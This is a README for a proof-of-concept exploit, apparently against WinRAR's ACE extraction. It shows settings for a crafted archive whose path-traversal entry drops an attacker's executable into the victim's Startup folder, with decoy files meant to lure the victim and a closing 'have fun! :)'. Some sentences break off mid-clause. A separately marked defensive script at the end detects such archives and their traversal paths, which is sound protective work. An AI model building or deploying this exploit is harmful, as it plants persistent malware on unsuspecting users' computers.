poc by Ridter
How to use?
You just need to install Python 3.7 and prepare the evil file you want to run. Set the values you want, and this exp script will generate the evil archive file automatically!
- set the values you want
```python
... ...
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such as shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=
filename_list = ["hello.txt", "world.txt"]
... ...
def get_right_hdr_crc(filename):
    # This command may be different, it depends on your Python 3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    # findall() returns a list; take the first match
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)
... ...
```
- run the exp, exp generated the
- if the victim opens the test.rar, he will see the file world.txt, you can also add more files, more attractive files.
- when he unpacks the file, the victim's user startup directory will have one more file named hi.exe, actually it's a calc.exe. when he restarts the computer, the
have fun! :)
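A defender-side check for the archive described above, added here as an example and not part of the original PoC: it flags a file named `.rar` whose content carries the ACE signature, and entry names that would extract outside the chosen folder. The function names are hypothetical, and the entry names are assumed to have been listed already by an ACE parser.

```python
import re

ACE_MAGIC = b"**ACE**"        # signature inside an ACE main header
RAR_MAGIC = b"Rar!\x1a\x07"   # signature that starts a genuine RAR file

def content_mismatch(filename, data, window=4096):
    """True when a file named .rar is really an ACE archive."""
    named_rar = filename.lower().endswith(".rar")
    return named_rar and not data.startswith(RAR_MAGIC) and ACE_MAGIC in data[:window]

def risky_entry_name(name):
    """Return the reasons an entry name must not be used as an extraction path."""
    path = name.replace("/", "\\")
    reasons = []
    if re.search(r"(^|\\)[A-Za-z]:", path):
        reasons.append("drive-letter prefix")
    if path.startswith("\\"):
        reasons.append("rooted or UNC path")
    # Strip stacked drive prefixes ("C:C:..") before looking for ".." components.
    parts = [re.sub(r"^(?:[A-Za-z]:)+", "", p) for p in path.split("\\")]
    if ".." in parts:
        reasons.append("parent-directory component")
    if "\\start menu\\programs\\startup\\" in path.lower():
        reasons.append("writes to a Startup folder")
    return reasons

def triage(filename, data, entry_names):
    """Collect findings for one archive; an empty list means nothing was flagged."""
    findings = []
    if content_mismatch(filename, data):
        findings.append((filename, ["ACE content behind a .rar name"]))
    for name in entry_names:
        reasons = risky_entry_name(name)
        if reasons:
            findings.append((name, reasons))
    return findings

# Constructed sample: seven filler bytes, then the ACE signature (not a real archive).
SAMPLE_DATA = b"\x00" * 7 + ACE_MAGIC + b"\x00" * 16
# Entry names: the two decoy names and the target path shown on this page.
SAMPLE_NAMES = [
    "hello.txt",
    "world.txt",
    r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe",
]

if __name__ == "__main__":
    for item, reasons in triage("test.rar", SAMPLE_DATA, SAMPLE_NAMES):
        print(item, "->", ", ".join(reasons))
```

A mail gateway or download scanner can quarantine on any finding; an extractor should refuse the entry rather than try to clean the name.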